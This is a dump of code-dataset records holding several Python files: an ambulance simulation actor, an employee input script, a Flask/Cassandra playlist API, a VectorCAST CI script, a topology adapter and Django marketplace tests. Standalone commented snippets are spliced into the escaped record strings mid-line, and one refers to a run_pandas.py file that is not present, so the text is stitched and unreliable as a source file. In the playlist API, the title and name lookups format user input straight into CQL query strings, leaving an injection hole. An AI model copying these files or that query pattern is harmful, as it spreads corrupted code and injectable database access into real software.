smart_intervention.geolocation.map import RoutingError\nfrom smart_intervention.models.actors.ambulance.ambulance_notification import AmbulanceNotification\nfrom smart_intervention.models.actors.ambulance.ambulance_purpose import AmbulancePurpose\nfrom smart_intervention.models.actors.ambulance_headquarter.ambulance_headquarter_notification import \\\n AmbulanceHeadquarterNotification\nfrom smart_intervention.models.actors.bases.purposeful_actor import PurposefulActor\nfrom smart_intervention.utils.processing import mass_process\n\n\nclass AmbulanceError(Exception):\n pass\n\n\nclass Ambulance(PurposefulActor, GeolocatedActor):\n def __init__(self, purpose: AmbulancePurpose, location: Location, efficiency, ambulance_hq: Location):\n super().__init__(purpose)\n super(PurposefulActor, self).__init__(location)\n self.efficiency = efficiency\n self.intervention_event = None\n self.ambulance_hq = ambulance_hq\n self.current_route = None\n self.log = logging.getLogger(f'Ambulance#{id(self)}')\n\n def tick_action(self, notifications) -> Callable:\n def action():\n processable_notifications = notifications.get_notifications_for_processing(self)\n 
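# timeAndWrite in run_pandas.py converts timeit's total runtime in seconds
# into a per-iteration figure in milliseconds. A standalone sketch of that
# arithmetic with a toy workload in place of the benchmark queries:
from timeit import timeit

iters = 10
total_seconds = timeit(lambda: sum(range(1000)), number=iters)
per_call_ms = (1000.0 * total_seconds) / iters
print("%.4f ms per call" % per_call_ms)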
processable_notifications = processable_notifications.get()\n processable_notifications = [\n notification for notification in processable_notifications\n if notification.payload['ambulance'] == self\n ] # Filter out notifications for other instances of ambulances\n processable_len = len(processable_notifications)\n notifications.declare_received(processable_len)\n self.log.debug(f'Received {processable_len} processable notifications')\n self._process_notifications(processable_notifications)\n self._take_action()\n\n return action\n\n def re_purpose(self, purpose):\n self.log.info(f'Changing purpose to #{purpose.value}')\n super().re_purpose(purpose)\n\n def _route_to(self, route):\n self.log.debug(f'Routing to {id(route[-1])}')\n self.current_route = route\n\n def _route_with_purpose(self, location, purpose): # TODO: Refactor - abstract out to geolocated + purposeful actor\n self._route_to(CityMap.route(self.location, location))\n self.re_purpose(purpose)\n\n @mass_process\n def _process_notifications(self, notifications):\n def process_one(notification):\n if notification.type == AmbulanceHeadquarterNotification.DISPATCH_TO_EVENT:\n event_location = notification.payload['location']\n self._route_with_purpose(event_location, AmbulancePurpose.ROUTING_TO_ASSIST)\n\n return notifications, process_one\n\n def _take_action(self):\n {\n AmbulancePurpose.IDLE: lambda: None,\n AmbulancePurpose.ROUTING_TO_ASSIST: self._routing_actions,\n AmbulancePurpose.ASSISTING: self._assisting_actions,\n AmbulancePurpose.ROUTING_TO_HQ: self._routing_actions,\n }[self.purpose]()\n\n def move_and_join_event(self):\n try:\n self.move_forward(self.current_route)\n except RoutingError:\n self.try_join_event()\n\n def try_join_event(self):\n intervention_event = self.location.intervention_event\n if intervention_event:\n self.intervention_event = intervention_event\n intervention_event.join(self)\n self.re_purpose(AmbulancePurpose.ASSISTING)\n self.log.info(f'Joined intervention event {id(intervention_event)} to assist')\n else:\n self._route_with_purpose(self.ambulance_hq, AmbulancePurpose.ROUTING_TO_HQ)\n\n def _routing_actions(self):\n try:\n self.move_and_join_event()\n except AmbulanceError as a_err: # This piece is used like a safeguard for routing to hq\n if self.purpose is AmbulancePurpose.ROUTING_TO_HQ:\n self.re_purpose(AmbulancePurpose.IDLE)\n else:\n raise a_err\n\n def _assisting_actions(self):\n if self.intervention_event.active: # If the actions grow, make a similar inactive guard as in policeman\n self.send_notification_with_location(AmbulanceNotification.ASSISTING)\n self.intervention_event.mitigate(self)\n else:\n self._route_with_purpose(self.ambulance_hq, AmbulancePurpose.ROUTING_TO_HQ)\n self.send_notification(AmbulanceNotification.RETURNING_TO_HQ)\n\n def send_notification(self, notification_type, payload=None):\n self.log.debug(f'Sending notification {notification_type.value}, payload: {payload}')\n notifications.send(\n type=notification_type,\n actor=self,\n payload=payload\n )\n\n def send_notification_with_location(self, notification_type):\n self.send_notification(\n notification_type=notification_type, payload={'location': self.location}\n )\n","sub_path":"smart_intervention/models/actors/ambulance/ambulance.py","file_name":"ambulance.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"564974167","text":"# This program tests the Employee class by generating 3 objects and\n# displaying their 
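# Ambulance._take_action above dispatches on the current purpose through a
# dict of callables instead of an if/elif chain. A minimal standalone sketch
# of the same pattern; the enum values and handlers here are made up, not the
# simulation's real ones:
from enum import Enum

class Purpose(Enum):
    IDLE = "idle"
    ROUTING = "routing"

def handle_routing():
    print("moving one step along the route")

def take_action(purpose):
    # look up the handler for this purpose, then call it
    {
        Purpose.IDLE: lambda: None,
        Purpose.ROUTING: handle_routing,
    }[purpose]()

take_action(Purpose.ROUTING)  # prints the routing message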
contained information\n\nfrom random import randint\n# import the employee class\nimport EmployeeClass\n\ndef main():\n    # get the list of objects to display\n    employees = get_employees(3)\n    # display the information\n    display_employees(employees)\n\n# define the get employees function\ndef get_employees(p_amount):\n    # Create an empty list to store the objects generated\n    result_list = []\n    # Prompt for p_amount objects' information\n    for emp in range(1, p_amount + 1):\n        print(f'\\nEmployee entry {emp}:')\n        name = input('Enter the employee\\'s name: ').title()\n        department = input(f'What department is {name} assigned?: ')\n        title = input(f'{name}\\'s work title?: ')\n        # grab a randomly generated 5-digit employee id\n        id_num = randint(10000, 99999)\n\n        # add the data to an employee object\n        employee = EmployeeClass.Employee(name, id_num, department, title)\n        # add the object to the returning list\n        result_list.append(employee)\n    # return the list of employee objects\n    return result_list\n\n# define the display employees function\ndef display_employees(p_list):\n    # iterate through the list\n    for employee in p_list:\n        # Display the employee's information\n        print(f'\\nEmployee ID: {employee.get_id_num()}')\n        print(f'\\tName: {employee.get_name()}')\n        print(f'\\tTitle: {employee.get_title()}')\n        print(f'\\tDepartment: {employee.get_department()}')\n\n# call the main function\nmain()\n\n","sub_path":"studentCode/employee.py","file_name":"employee.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"613667919","text":"import sys\nimport flask_api\nimport datetime\nfrom flask import request, g, jsonify, Response\nfrom flask_api import FlaskAPI,status, exceptions\nfrom cassandra.cluster import Cluster\n\napp = FlaskAPI(__name__) \n\n@app.route('/', methods=['GET'])\ndef home():\n    return \"Playlists API\"\n\n\n@app.route(\"/playlists\",methods=['POST'])\ndef create_playlists():\n\tmandatory_fields = ['playlist_title','user_name','track_title']\n\n\tif not all([field in request.data for field in mandatory_fields]):\n \traise exceptions.ParseError()\n\n\tplaylist_title = request.data.get('playlist_title','')\n\tuser_name = request.data.get('user_name','')\n\ttrack_title = request.data.get('track_title','')\n\tdescription = request.data.get('description','')\n\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\tcurDate = datetime.datetime.now()\n\n\trows = session.execute(\"\"\"Select id from musicData where track_title = %(track_title)s ALLOW FILTERING;\"\"\",{'track_title':track_title})\n\n\tid = None\n\tfor row in rows:\n\t\tid = row.id\n\n\tif id is None:\n\t\treturn 'track_title ID Not found'\n\telse:\n\t\trows = session.execute(\"\"\"Select user_name,playlist_title, album_title, track_artist, track_length, media_url, album_url from musicData where id = %(id)s ALLOW FILTERING;\"\"\",{'id':id})\n\n\t\tu_name = None\n\t\tp_title = None\n\t\tfor row in rows:\n\t\t\tu_name = row.user_name\n\t\t\tp_title = row.playlist_title\n\t\t\ta_title = row.album_title\n\t\t\tt_artist = row.track_artist\n\t\t\tt_length = row.track_length\n\t\t\tm_url = row.media_url\n\t\t\ta_url = row.album_url\n\n\t\tif u_name is None:\n\t\t\tsession.execute(\"\"\"UPDATE musicData\n\t\t\tset playlist_title = %(playlist_title)s,\n\t\t\tuser_name = %(user_name)s,\n\t\t\tdescription = %(description)s,\n\t\t\tmodifieddate = %(modifieddate)s\n\t\t\twhere Id = %(id)s\"\"\",\n\t\t\t{'playlist_title': playlist_title, 
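# get_employees in employee.py above draws each 5-digit ID independently with
# randint, so two employees can collide on the same ID. A hedged alternative
# (not what the original does): random.sample draws without replacement,
# guaranteeing distinct IDs for a batch.
import random

ids = random.sample(range(10000, 100000), 3)
print(ids)                 # e.g. [48213, 10997, 73555]
assert len(set(ids)) == 3  # always distinct within one batch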
'user_name': user_name, 'description': description, 'id':id, 'modifieddate': str(curDate)})\n\t\telse:\n\t\t\trows = session.execute(\"Select max(Id) as id from musicData\")\n\n\t\t\tfor row in rows:\n\t\t\t\t\tnew_id = row.id\n\n\t\t\tif new_id is None:\n\t\t\t\tnew_id = 1\n\t\t\telse:\n\t\t\t\tnew_id = new_id + 1\n\n\t\t\tif(u_name == user_name):\n\t\t\t\tif(p_title == playlist_title):\t\t\t\t\n\t\t\t\t\treturn 'same user_name and same playlist already exists!!!'\n\t\t\t\telse:\n\t\t\t\t\tsession.execute(\"\"\"INSERT into musicData (track_title, album_title, track_artist, track_length, media_url, album_url, playlist_title, user_name, description, id, createddate) \n\t\t\t\t\tvalues (%(track_title)s, %(album_title)s, %(track_artist)s, %(track_length)s, %(media_url)s, %(album_url)s, %(playlist_title)s,%(user_name)s,%(description)s, %(new_id)s, %(createddate)s)\"\"\",\n\t\t\t\t\t{'track_title': track_title, 'album_title': a_title, 'track_artist': t_artist, 'track_length':t_length, 'media_url':m_url, 'album_url':a_url, 'playlist_title': playlist_title, 'user_name': user_name, 'description': description, 'new_id':new_id, 'createddate': str(curDate)})\n\t\t\telse:\n\t\n\t\t\t\tsession.execute(\"\"\"INSERT into musicData (track_title, album_title, track_artist, track_length, media_url, album_url, playlist_title, user_name, description, id, createddate) \n\t\t\t\tvalues (%(track_title)s, %(album_title)s, %(track_artist)s, %(track_length)s, %(media_url)s, %(album_url)s, %(playlist_title)s,%(user_name)s,%(description)s, %(new_id)s, %(createddate)s)\"\"\",\n\t\t\t\t{'track_title': track_title, 'album_title': a_title, 'track_artist': t_artist, 'track_length':t_length, 'media_url':m_url, 'album_url':a_url, 'playlist_title': playlist_title, 'user_name': user_name, 'description': description, 'new_id':new_id,'createddate': str(curDate)})\n\n\n\tresponse = Response(status=201)\n\tresponse.headers['location'] = '/playlistsbyuser/'+user_name\n\tresponse.headers['status'] = '201 Created'\n\n\treturn response, status.HTTP_201_CREATED\n\n\n#To get particular plalist info\n@app.route(\"/playlists/<playlist_id>\",methods=['GET'])\ndef get_playlist(playlist_id):\n\ttry:\n\t\tcluster = Cluster(['172.17.0.2'])\n\t\tsession = cluster.connect('music')\n\t\tcurDate = datetime.datetime.now()\n\n\t\tresult = session.execute(\"\"\"select user_name,playlist_title,track_id from musicData where playlist_id = %(playlist_id)s ALLOW FILTERING;\"\"\", {'playlist_id':playlist_id})\n\t\t\n\texcept Exception as e:\n \treturn { 'error': str(e) }, status.HTTP_404_NOT_FOUND\n \t\n\tif result is None:\n\t\treturn { 'error': str(e) }, status.HTTP_404_NOT_FOUND\n\t\n\treturn jsonify(list(result)), status.HTTP_200_OK\n\n\n@app.route(\"/playlists\",methods=['GET'])\ndef get_all_playlists():\n\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\tresult = session.execute(\"select * from musicData\")\n\n\tif result is None:\n\t\tresp = Response(status=404, mimetype='application/json')\n\t\treturn resp\n\n\treturn jsonify(list(result))\n\n\n@app.route(\"/playlistsbytitle/<playlist_title>\",methods=['GET'])\ndef get_playlistByTitle(playlist_title):\n\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\n\tresult = session.execute(\"select user_name,playlist_title,createddate,track_title from musicData where playlist_title ='%s' ALLOW FILTERING\" %playlist_title)\n\n\tif result is None:\n\t\tresp = Response(status=404, mimetype='application/json')\n\t\treturn resp\n\n\treturn 
jsonify(list(result))\n\n\n@app.route(\"/playlistsbyname/<user_name>\",methods=['GET'])\ndef get_playlistByName(user_name):\n\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\n\tresult = session.execute(\"select user_name,playlist_title,createddate from musicData where user_name ='%s' ALLOW FILTERING\" %user_name)\n\n\tif result is None:\n\t\tresp = Response(status=404, mimetype='application/json')\n\t\treturn resp\n\n\treturn jsonify(list(result))\n\n@app.route(\"/playlists/<playlist_title>\",methods=['DELETE'])\ndef delete_playlist(playlist_title):\n\t\n\tcluster = Cluster(['172.17.0.2'])\n\tsession = cluster.connect('music')\n\trows = session.execute(\"\"\"Select id from musicData where playlist_title = %(playlist_title)s ALLOW FILTERING;\"\"\",{'playlist_title':playlist_title})\n\n\tidNo = None\n\tfor row in rows:\n\t\tidNo = row.id\n\n\tif idNo is None:\n\t\treturn 'playlist_title ID Not found'\n\n\tsession.execute(\"delete from musicData where Id = %(idNo)s\",{'idNo':idNo})\n\n\tresp = Response(status=200, mimetype='application/json')\n \n\treturn resp\n\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\n\t\n","sub_path":"playlists.py","file_name":"playlists.py","file_ext":"py","file_size_in_byte":6199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"232414041","text":"#\n# The MIT License\n#\n# Copyright 2020 Vector Informatik, GmbH.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
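# create_playlists in playlists.py above allocates record IDs with
# "Select max(Id) ... + 1", which can race when two requests insert
# concurrently. A common alternative (a sketch only, not the service's actual
# schema) is a client-generated UUID, which needs no coordination:
import uuid

new_id = uuid.uuid4()
print(str(new_id))  # e.g. '6f1c...' - unique without coordinating writers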
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nimport os, subprocess, argparse, glob, sys\n\nfrom managewait import ManageWait\nfrom parse_console_for_cbt import ParseConsoleForCBT\nimport generate_results \nimport cobertura\n\n\nclass AzureExecute(object):\n    def __init__(self, ManageProject, useCILicense, useCBT, level, environment, verbose, print_exc, timing, buildlog):\n\n        # setup default values\n        self.print_exc = print_exc\n        self.timing = timing\n\n        self.verbose = verbose\n        self.FullMP = ManageProject\n        self.mpName = os.path.basename(ManageProject)[:-4]\n\n        if useCILicense:\n            self.useCI = \" --ci \"\n        else:\n            self.useCI = \"\"\n\n        if useCBT:\n            self.useCBT = \" --incremental \"\n        else:\n            self.useCBT = \"\"\n\n        self.build_log = None\n        \n        self.useLevelEnv = False\n        self.environment = None\n        self.level = None\n        self.compiler = \"\"\n        self.testsuite = \"\"\n        self.reportsName = \"\"\n        self.env_option = \"\"\n        self.level_option = \"\"\n        self.build_log_name = buildlog\n\n        # if a manage level was specified...\n        if level: \n            self.useLevelEnv = True\n            self.level = level\n            \n            # try level being Compiler/TestSuite\n            try:\n                self.compiler, self.testsuite = level.split(\"/\")\n                self.reportsName = \"_\" + self.compiler + \"_\" + self.testsuite\n            except ValueError:\n                # just use the compiler name\n                self.compiler = level\n                self.reportsName = \"_\" + self.compiler\n            \n            self.level_option = \"--level \" + level + \" \"\n\n        # if an environment was specified\n        if environment:\n            # affix the proper settings for commands later and report names\n            self.useLevelEnv = True\n            self.environment = environment\n            self.env_option = \"--environment \" + environment + \" \"\n            self.reportsName += \"_\" + self.environment\n        \n        if self.useLevelEnv:\n            self.build_log_name = \"build\" + self.reportsName + \".log\" \n\n        self.manageWait = ManageWait(self.verbose, \"\", 30, 1, self.FullMP, self.useCI)\n\n    def runMetrics(self):\n        # read in build log for CBT analysis \n        if os.path.exists(self.build_log_name):\n            print (\"Using build log: \" + self.build_log_name)\n            self.build_log = open(self.build_log_name,\"r\").read()\n        \n        else:\n            print (\"Build log not found. 
Trying to generate complete log from individual build logs\")\n            self.build_log = \"\"\n            for file in glob.glob(\"build*.log\"):\n                if self.verbose: print(file)\n                self.build_log += open(file,\"r\").read() + \"\\n\" \n        \n        cbt = ParseConsoleForCBT(args.verbose)\n        cbtDict = None\n        \n        # don't show skipped tests as Azure shows them as \"Other\" instead of skipped\n#        if self.build_log:\n#            cbtDict = cbt.parse(self.build_log)\n#        else:\n#            print(\"Could not find any build logs...skipping CBT Analysis\")\n        \n        generate_results.verbose = self.verbose\n        generate_results.print_exc = self.print_exc\n        generate_results.timing = self.timing\n        generate_results.buildReports(self.FullMP,self.level,self.environment, True, self.timing, cbtDict)\n\n        for file in glob.glob(\"xml_data/coverage_results_*.*\"):\n            try:\n                os.remove(file)\n            except OSError:\n                print(\"Error removing file: \" + file)\n        cobertura.azure = True\n        cobertura.generateCoverageResults(self.FullMP)\n\n    def runReports(self):\n        self.manageWait.exec_manage_command (\"--create-report=aggregate --output=\" + self.mpName + \"_aggregate_report.html\")\n        self.manageWait.exec_manage_command (\"--create-report=metrics --output=\" + self.mpName + \"_metrics_report.html\")\n        self.manageWait.exec_manage_command (\"--create-report=environment --output=\" + self.mpName + \"_environment_report.html\")\n\n    def runExec(self):\n\n        self.manageWait.exec_manage_command (\"--status\")\n        self.manageWait.exec_manage_command (\"--force --release-locks\")\n        self.manageWait.exec_manage_command (\"--config VCAST_CUSTOM_REPORT_FORMAT=HTML\")\n        \n        if self.useLevelEnv:\n            output = \"--output \" + self.mpName + self.reportsName + \"_rebuild.html\"\n        else:\n            output = \"\"\n        \n        self.build_log = self.manageWait.exec_manage_command (\"--build-execute \" + self.useCBT + self.level_option + self.env_option + output )\n        open(self.build_log_name,\"w\").write(self.build_log)\n\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('ManageProject', help='Manage Project Name')\n    parser.add_argument('--ci', help='Use CI Licenses', action=\"store_true\", default = False)\n    parser.add_argument('--incremental', help='Use CBT', action=\"store_true\", default = False)\n    parser.add_argument('--execute', help='Execute the VectorCAST Project', action=\"store_true\", default = False)\n    parser.add_argument('--metrics', help='Run the metrics for VectorCAST Project', action=\"store_true\", default = False)\n    parser.add_argument('--reports', help='Run the reports for VectorCAST Project', action=\"store_true\", default = False)\n    parser.add_argument('--print_exc', help='Prints exceptions', action=\"store_true\", default = False)\n    parser.add_argument('--buildlog', help='VectorCAST Build Log', default = \"complete_build.log\")\n    parser.add_argument('--timing', help='Prints timing information for metrics generation', action=\"store_true\", default = False)\n    parser.add_argument('-v', '--verbose', help='Enable verbose output', action=\"store_true\", default = False)\n    parser.add_argument('-l', '--level', help='Level to build/execute if only doing a single level. Should be in the form of compiler/testsuite')\n    parser.add_argument('-e', '--environment', help='Environment Name if only doing single environment. 
Should be in the form of level/env')\n\n args = parser.parse_args()\n\n\n if not os.path.isfile(args.ManageProject):\n print (\"Manage project (.vcm file) provided does not exist: \" + args.ManageProject)\n print (\"exiting...\")\n sys.exit(-1)\n\n glExec = AzureExecute(args.ManageProject, args.ci, args.incremental, args.level, args.environment, args.verbose, args.print_exc, args.timing, args.buildlog)\n\n if args.execute:\n glExec.runExec()\n \n if args.metrics:\n glExec.runMetrics()\n\n if args.reports:\n glExec.runReports()\n","sub_path":"azure/vc_scripts/azure_exec.py","file_name":"azure_exec.py","file_ext":"py","file_size_in_byte":7842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"168188957","text":"import time\n\nfrom gtda.homology import FlagserPersistence\nimport math\n\nfrom Configuration.Constants import PersistenceComputation as RipserConstants\nfrom model.homology.PersistenceDiagram import PersistenceDiagram\nfrom model.homology.PersistenceDiagramPoint import PersistenceDiagramPoint\n\nDEFAULT_UPPER_DIM = RipserConstants.DEFAULT_UPPER_DIM\n\n\ndef compute_persistence_diagram(distance_matrix,\n upper_dim=DEFAULT_UPPER_DIM):\n flagser_computer = FlagserPersistence(homology_dimensions=list(range(upper_dim+1)), directed=False,\n reduced_homology=False, max_entries=1000)\n print(\"Starting computation PDS\")\n start = time.time()\n flagser_diagram = flagser_computer.fit_transform([distance_matrix.array])[0]\n end = time.time()\n print(\"Finished in {}s\".format(end - start))\n diagram = PersistenceDiagram()\n for point in flagser_diagram:\n if math.isclose(point[0], point[1]):\n diagram.add_point(PersistenceDiagramPoint(int(point[2]), point[0], point[1]))\n return diagram\n","sub_path":"NeurIPSSoftware/adapters/FlagserAdapter.py","file_name":"FlagserAdapter.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"540077056","text":"import json\n\nfrom django.conf import settings\nfrom django.utils.encoding import iri_to_uri\n\nfrom mock import patch\nfrom nose.tools import eq_\nfrom pyquery import PyQuery as pq\nimport waffle\n\nimport amo\nfrom amo.helpers import absolutify, numberfmt, page_title\nimport amo.tests\nfrom amo.urlresolvers import reverse\nfrom amo.utils import urlparams\nfrom addons.models import Addon, AddonCategory, AddonUser, Category\nfrom addons.tests.test_views import add_addon_author, test_hovercards\nfrom browse.tests import test_listing_sort, test_default_sort, TestMobileHeader\nfrom market.models import AddonPremium, Price\nfrom sharing import get_service\nfrom tags.models import AddonTag, Tag\nfrom translations.helpers import truncate\nfrom users.models import UserProfile\nfrom versions.models import Version\nfrom webapps.models import Webapp\n\n\nclass WebappTest(amo.tests.TestCase):\n\n def setUp(self):\n self.webapp = Webapp.objects.create(name='woo', app_slug='yeah',\n weekly_downloads=9999, status=amo.STATUS_PUBLIC)\n self.webapp._current_version = (Version.objects\n .create(addon=self.webapp))\n self.webapp.save()\n\n self.webapp_url = self.url = self.webapp.get_url_path()\n\n\nclass PaidAppMixin(object):\n\n def setup_paid(self, type_=None):\n type_ = amo.ADDON_PREMIUM if type_ is None else type_\n self.free = [\n Webapp.objects.get(id=337141),\n amo.tests.addon_factory(type=amo.ADDON_WEBAPP),\n ]\n\n self.paid = []\n for x in xrange(1, 3):\n price = Price.objects.create(price=x)\n addon = 
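# runMetrics in azure_exec.py above falls back to stitching together every
# build*.log with glob when the complete log is missing. A standalone sketch
# of that fallback (sorted() added here for a stable order, which the original
# does not do):
import glob

build_log = ""
for name in sorted(glob.glob("build*.log")):
    with open(name) as f:
        build_log += f.read() + "\n"
print("combined %d characters" % len(build_log))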
amo.tests.addon_factory(type=amo.ADDON_WEBAPP,\n weekly_downloads=x * 100)\n AddonPremium.objects.create(price=price, addon=addon)\n addon.update(premium_type=type_)\n self.paid.append(addon)\n\n # For measure add some disabled free apps ...\n amo.tests.addon_factory(type=amo.ADDON_WEBAPP, disabled_by_user=True)\n amo.tests.addon_factory(type=amo.ADDON_WEBAPP, status=amo.STATUS_NULL)\n\n # ... and some disabled paid apps.\n addon = amo.tests.addon_factory(type=amo.ADDON_WEBAPP,\n disabled_by_user=True, premium_type=amo.ADDON_PREMIUM)\n AddonPremium.objects.create(price=price, addon=addon)\n addon = amo.tests.addon_factory(type=amo.ADDON_WEBAPP,\n status=amo.STATUS_NULL, premium_type=amo.ADDON_PREMIUM)\n AddonPremium.objects.create(price=price, addon=addon)\n\n self.both = sorted(self.free + self.paid,\n key=lambda x: x.weekly_downloads, reverse=True)\n self.free = sorted(self.free, key=lambda x: x.weekly_downloads,\n reverse=True)\n self.paid = sorted(self.paid, key=lambda x: x.weekly_downloads,\n reverse=True)\n\n\nclass TestPremium(PaidAppMixin, amo.tests.TestCase):\n fixtures = ['base/apps', 'base/users', 'webapps/337141-steamcube']\n\n def setUp(self):\n waffle.models.Switch.objects.create(name='marketplace', active=True)\n self.url = reverse('apps.home')\n self.user = UserProfile.objects.get(email='regular@mozilla.com')\n self.setup_paid()\n eq_(self.free, list(Webapp.objects.top_free()))\n eq_(self.paid, list(Webapp.objects.top_paid()))\n\n\nclass TestHome(TestPremium):\n\n def test_free(self):\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n doc = pq(r.content)\n eq_(list(r.context['free']), self.free)\n for idx, element in enumerate(doc('#top-free .item')):\n item = pq(element)\n webapp = self.free[idx]\n eq_(item.find('.price').text(), 'FREE')\n eq_(item.find('.downloads').split()[0],\n numberfmt(webapp.weekly_downloads))\n\n def test_paid(self):\n r = self.client.get(self.url)\n eq_(r.status_code, 200)\n doc = pq(r.content)\n eq_(list(r.context['paid']), self.paid)\n for idx, element in enumerate(doc('#top-paid .item')):\n item = pq(element)\n webapp = self.paid[idx]\n eq_(item.find('.price').text(), webapp.premium.get_price_locale())\n eq_(item.find('.downloads').split()[0],\n numberfmt(webapp.weekly_downloads))\n\n\nclass TestLayout(WebappTest):\n\n def setUp(self):\n super(TestLayout, self).setUp()\n self.url = reverse('apps.home')\n\n def test_header(self):\n for url in (self.url, reverse('apps.list')):\n r = self.client.get(url)\n eq_(r.status_code, 200)\n doc = pq(r.content)\n eq_(doc('h1.site-title').text(), 'Apps')\n eq_(doc('#site-nav.app-nav').length, 1)\n eq_(doc('#search-q').attr('placeholder'), 'search for apps')\n\n def test_header_links(self):\n browse = reverse('apps.list')\n cat = Category.objects.create(name='Games', slug='games',\n type=amo.ADDON_WEBAPP)\n expected = [\n ('Most Popular', urlparams(browse, sort='downloads')),\n ('Top Free', urlparams(browse, sort='free')),\n ('Top Paid', urlparams(browse, sort='paid')),\n ('Highest Rated', urlparams(browse, sort='rating')),\n ('Games', cat.get_url_path()),\n ]\n\n r = self.client.get(self.url)\n doc = pq(r.content)('#site-nav')\n\n amo.tests.check_links(expected, doc('#explore-cats li a'))\n eq_(doc('#my-apps a').attr('href'), reverse('users.purchases'))\n eq_(doc('#submit-app a').attr('href'), reverse('devhub.submit_apps.1'))\n\n @patch.object(settings, 'READ_ONLY', False)\n def test_balloons_no_readonly(self):\n response = self.client.get(self.url)\n doc = pq(response.content)\n 
eq_(doc('#site-notice').length, 0)\n eq_(doc('#site-nonfx').length, 0)\n eq_(doc('#site-welcome').length, 0)\n eq_(doc('#site-nojs-apps').length, 1)\n eq_(doc('#appruntime-pitch').length, 1)\n\n @patch.object(settings, 'READ_ONLY', True)\n def test_balloons_readonly(self):\n response = self.client.get(self.url)\n doc = pq(response.content)\n eq_(doc('#site-notice').length, 1)\n eq_(doc('#site-nonfx').length, 0)\n eq_(doc('#site-welcome').length, 0)\n eq_(doc('#site-nojs-apps').length, 1)\n eq_(doc('#appruntime-pitch').length, 1)\n\n def test_footer(self):\n doc = pq(self.client.get(self.url).content)\n eq_(doc('#social-footer').length, 0)\n eq_(doc('#copyright').length, 1)\n eq_(doc('#footer-links .mobile-link').length, 1)\n\n def test_search_url(self):\n for url in (self.url, self.webapp_url):\n response = self.client.get(url)\n doc = pq(response.content)\n eq_(doc('#search').attr('action'), '/en-US/apps/search/')\n\n\nclass TestListing(TestPremium):\n\n def setUp(self):\n super(TestListing, self).setUp()\n self.url = reverse('apps.list')\n\n def test_default_sort(self):\n test_default_sort(self, 'downloads', 'weekly_downloads')\n\n def test_free_sort(self):\n for app in test_listing_sort(self, 'free', 'weekly_downloads'):\n eq_(app.is_premium(), False)\n\n def test_paid_sort(self):\n for app in test_listing_sort(self, 'paid', 'weekly_downloads'):\n eq_(app.is_premium(), True)\n\n def test_price_sort(self):\n apps = test_listing_sort(self, 'price', None, reverse=False,\n sel_class='extra-opt')\n eq_(apps, list(Webapp.objects.listed()\n .order_by('addonpremium__price__price', 'id')))\n\n def test_rating_sort(self):\n test_listing_sort(self, 'rating', 'bayesian_rating')\n\n def test_newest_sort(self):\n test_listing_sort(self, 'created', 'created', sel_class='extra-opt')\n\n def test_name_sort(self):\n test_listing_sort(self, 'name', 'name', reverse=False,\n sel_class='extra-opt')\n\n\nclass TestDetail(WebappTest):\n fixtures = ['base/apps', 'base/addon_3615', 'base/addon_592', 'base/users']\n\n def get_pq(self):\n return pq(self.client.get(self.url).content.decode('utf-8'))\n\n def get_more_pq(self):\n more_url = self.webapp.get_url_path(more=True)\n return pq(self.client.get_ajax(more_url).content.decode('utf-8'))\n\n def test_title(self):\n eq_(self.get_pq()('title').text(), 'woo :: Apps Marketplace')\n\n def test_downloads(self):\n dls = self.get_pq()('#weekly-downloads')\n eq_(dls.find('a').length, 0)\n eq_(dls.text().split()[0], numberfmt(self.webapp.weekly_downloads))\n self.webapp.update(weekly_downloads=0)\n eq_(self.get_pq()('#weekly-downloads').length, 0)\n\n def test_more_url(self):\n eq_(self.get_pq()('#more-webpage').attr('data-more-url'),\n self.webapp.get_url_path(more=True))\n\n def test_headings(self):\n doc = self.get_pq()\n eq_(doc('#addon h1').text(), 'woo')\n eq_(doc('section.primary.island.c h2:first').text(), 'About this App')\n\n def test_add_review_link_aside(self):\n eq_(self.get_pq()('#reviews-link').attr('href'),\n reverse('apps.reviews.list', args=[self.webapp.app_slug]))\n\n def test_add_review_link_more(self):\n doc = self.get_more_pq()\n add_url = reverse('apps.reviews.add', args=[self.webapp.app_slug])\n eq_(doc.find('#reviews #add-first-review').attr('href'), add_url)\n eq_(doc.find('#reviews h3').remove('a').text(),\n 'This app has not yet been reviewed.')\n eq_(doc.find('#add-review').attr('href'), add_url)\n\n def test_other_apps(self):\n \"\"\"Ensure listed apps by the same author show up.\"\"\"\n # Create a new webapp.\n 
